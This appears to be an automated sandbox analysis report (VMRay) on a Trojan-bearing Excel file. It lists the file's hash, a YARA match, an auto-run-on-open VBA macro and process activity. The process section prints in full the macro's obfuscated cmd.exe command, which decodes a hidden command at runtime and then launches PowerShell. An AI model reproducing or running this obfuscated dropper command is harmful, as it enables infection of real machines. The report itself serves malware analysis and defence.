VTI SCORE: 98/100
Dynamic Analysis Report
Classification: Trojan

f39618fbdbb3788fa9444c84522a069b867e3237567ddd722f5e9a42838a4371 (SHA256)

201810302482 (1).xls

Excel Document

Created at 2018-10-31 01:20:00

Severity Category Operation Classification
4/5
Process Creates process -
  • Creates process "cmd /V:ON/C"set d0=rMc5( ""Fj$hEJOYU2uwf=ip7CGdI-klmngTR,H34/^|B]Lbs'o%AXvy1[V_0{D;+:}*^&x\aPSW6^^9`etK).N&&for %x in (12,2,11,14,5,5,5,75,75,75,67,4,7,60,17,65,60,55,65,60,59,65,7,5,29,20,5,48,12,1,48,37,48,28,35,48,37,48,72,12,35,29,48,81,5,5,4,7,60,55,65,60,17,65,60,59,65,7,5,29,20,48,17,27,26,48,37,48,53,51,48,37,48,0,22,70,46,31,78,64,48,81,5,5,4,5,5,56,35,54,71,12,44,4,7,60,59,65,60,55,65,7,29,8,5,48,1,51,35,48,37,48,38,48,81,5,5,81,62,5,5,82,4,7,60,59,65,60,55,65,60,17,65,7,5,29,20,5,48,47,12,48,37,48,79,29,48,37,48,22,79,12,1,48,81,5,5,4,7,60,55,65,60,59,65,60,17,65,60,40,65,60,39,65,7,29,20,5,48,70,48,37,48,53,70,0,22,48,37,48,43,48,37,48,27,26,83,57,48,37,48,31,12,64,48,81,5,4,5,56,35,54,71,12,44,4,7,60,40,65,60,55,65,60,59,65,60,39,65,60,17,65,7,5,29,8,5,48,82,12,83,25,48,37,48,12,32,82,35,78,52,35,48,37,48,33,26,48,37,48,14,27,22,48,37,48,47,54,47,35,48,81,5,5,81,5,5,62,5,5,75,75,75,67,4,7,60,59,65,60,55,65,7,5,29,20,5,48,47,48,37,48,70,31,48,81,5,4,48,70,48,81,5,4,7,60,59,65,60,55,65,60,17,65,7,29,20,48,83,78,19,29,14,46,9,78,48,37,48,2,48,37,48,79,48,81,62,82,4,7,60,55,65,60,59,65,7,5,29,20,5,48,29,35,54,23,78,48,37,48,51,27,27,48,81,5,29,51,47,47,78,32,46,31,54,83,70,32,78,5,4,7,60,59,65,60,17,65,60,39,65,60,55,65,60,40,65,7,5,29,20,48,72,54,48,37,48,0,70,19,22,48,37,48,47,48,37,48,79,78,32,82,61,48,37,48,33,34,48,81,62,10,60,34,65,21,75,75,75,67,4,48,70,48,81,5,4,7,60,40,65,60,55,65,60,39,65,60,17,65,60,59,65,7,29,20,5,48,23,48,37,48,79,78,32,82,61,0,70,48,37,48,34,82,43,22,79,32,70,48,37,48,19,22,33,48,37,48,72,54,47,48,81,4,4,82,4,48,70,48,81,5,4,7,60,17,65,60,59,65,60,55,65,7,29,20,5,48,31,22,78,33,48,37,48,79,48,37,48,83,78,79,82,73,78,46,25,48,81,81,82,4,7,60,55,65,60,59,65,7,5,29,20,48,78,33,36,78,70,27,48,37,48,14,23,48,81,82,28,33,53,49,30,78,4,4,7,60,59,65,60,17,65,60,39,65,60,74,65,60,3,65,60,55,65,60,40,65,7,5,29,20,5,48,11,79,48,37,48,78,82,22,46,46,82,2,49,41,9,0,61,13,53,59,41,11,23,82,23,33,48,37,48,79,23,47,64,41,
48,37,48,41,22,32,48,37,48,34,48,37,48,34,48,37,48,70,48,81,81,81,62,10,60,49,65,21,82,4,48,70,48,81,5,4,7,60,59,65,60,55,65,7,5,29,20,48,43,54,48,37,48,79,78,56,44,48,81,5,40,76,74,59,62,4,59,82,82,24,81,75,75,75,42,75,75,75,67,4,48,50,48,81,60,20,49,0,78,70,2,11,4,10,60,68,65,5,22,33,4,59,82,82,74,55,76,81,81,60,10,60,71,65,21,10,60,26,65,82,4,7,60,17,65,60,55,65,60,59,65,7,5,29,20,5,48,78,31,48,37,48,22,68,48,37,48,26,78,79,71,48,81,82,28,33,53,49,30,78,4,10,60,52,65,37,10,60,58,65,81,62,10,60,14,65,56,10,60,58,65,66,74,17,59,63,10,60,52,65,44,21,4,5,4,82,4,7,60,17,65,60,59,65,60,55,65,7,29,20,48,0,28,51,43,48,37,48,31,78,48,37,48,57,51,48,81,5,5,4,7,60,55,65,60,59,65,7,29,20,48,27,26,48,37,48,17,48,81,5,29,57,70,45,16,78,49,83,31,15,5,81,64,64,4,7,60,55,65,60,59,65,7,29,20,48,31,49,49,0,48,37,48,8,48,81,82,28,33,53,49,30,78,4,4,10,60,23,65,82,7,43,7,29,46,70,33,27,55,3,81,66,55,74,81,29,46,49,0,4,10,60,71,65,82,7,26,7,5,29,46,70,33,27,5,55,3,81,81,65,65,62,82,4,7,60,55,65,60,59,65,7,5,29,20,5,48,52,48,37,48,28,12,48,81,4,5,4,75,75,75,67,4,7,60,59,65,60,55,65,60,17,65,60,39,65,7,29,20,5,48,26,48,37,48,78,79,29,53,51,48,37,48,0,28,48,37,48,51,43,31,12,48,81,5,4,7,60,59,65,60,55,65,7,29,20,48,61,26,48,37,48,83,53,48,81,5,29,53,51,31,18,78,49,5,5,81,64,64,7,70,72,25,77,22,28,7,82,7,34,78,79,72,77,35,0,77,28,83,34,7,4,10,60,49,65,56,59,82,82,40,24,39,17,44,81,81,42,25,45,22,23,5,67,67,2,32,27,5,41,25,5,23,49,19,78,36,47,38,78,45,45,5,5,29,83,49,31,14,26,5,29,78,52,12,25,16,35,5,43,54,71,70,72,72,5,29,72,35,5,5,29,33,49,71,36,49,8,5,29,19,22,5,11,22,5,5,29,83,14,83,22,83,79,78,5,5,5,5,5,75,75,75,67,5,5,4,69,7,60,17,65,60,59,65,60,55,65,69,7,5,29,20,5,48,29,35,48,37,48,54,23,78,48,37,48,51,27,27,48,5,81,5,29,51,47,47,78,32,5,4,5,5,69,7,60,39,65,60,40,65,60,59,65,60,55,65,60,17,65,69,7,29,20,5,48,49,48,37,48,33,25,49,48,37,48,0,78,48,37,48,71,48,37,4,5,69,7,60,59,65,60,55,65,60,17,65,69,7,29,20,48,0,78,48,37,48,47,78,33,79,70,48,37,48,79,22,48,5,5,81,81,5,5,62,5,5,5,5,5
,82,4,5,5,69,7,60,39,65,60,17,65,60,55,65,60,59,65,69,7,29,20,5,4,5,5,69,7,60,59,65,60,55,65,69,7,5,29,20,5,48,72,28,48,37,48,14,33,48,81,37,4,5,5,69,7,60,55,65,60,59,65,69,7,5,29,20,48,78,47,48,37,48,68,71,0,48,5,81,37,48,78,48,37,4,5,69,7,60,59,65,60,55,65,69,7,5,29,20,48,28,48,37,48,83,53,14,30,78,29,48,81,5,5,81,5,4,5,5,4,5,56,19,22,83,61,49,19,72,82,25,45,22,23,43,49,51,0,61,44,64,64,4,69,7,60,55,65,60,59,65,69,7,5,29,20,48,52,79,48,37,4,69,7,60,55,65,60,59,65,69,7,29,20,48,35,78,48,37,48,26,78,35,48,81,5,81,82,69,7,28,33,77,57,49,80,12,69,7,4,5,5,81,5,81,5,81,5,5,5,62,56,73,22,33,27,49,19,47,82,25,31,22,23,46,49,70,0,27,44,64,64,4,5,5,69,7,60,55,65,60,59,65,69,7,5,29,20,5,48,0,48,37,4,69,7,60,55,65,60,59,65,69,7,29,20,48,31,78,70,48,37,48,25,48,5,5,81,5,81,82,69,7,22,77,83,57,49,80,78,69,7,4,5,5,81,90)do set hoR=!hoR!!d0:~%x,1!&&if %x==90 cmd /C!hoR:*hoR!=!"".
  • Creates process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe".
4/5
File System Known malicious file Trojan
  • File "C:\Users\aETAdzjz\Desktop\201810302482 (1).xls" is a known malicious file.
3/5
YARA YARA match -
  • Rule "VBA_Execution_Commands" from ruleset "Generic" has matched for "C:\Users\aETAdzjz\Desktop\201810302482 (1).xls"
2/5
VBA Macro Executes macro on specific worksheet event -
  • Executes macro automatically on target "workbook" and event "open".
1/5
VBA Macro Contains Office macro -
Function Logfile

This feature requires an online connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefox with the setting "security.fileuri.strict_origin_policy" deactivated.


    
Before

This feature requires an online connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefox with the setting "security.fileuri.strict_origin_policy" deactivated.


    
After

This feature requires an online connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefox with the setting "security.fileuri.strict_origin_policy" deactivated.


    
Screenshot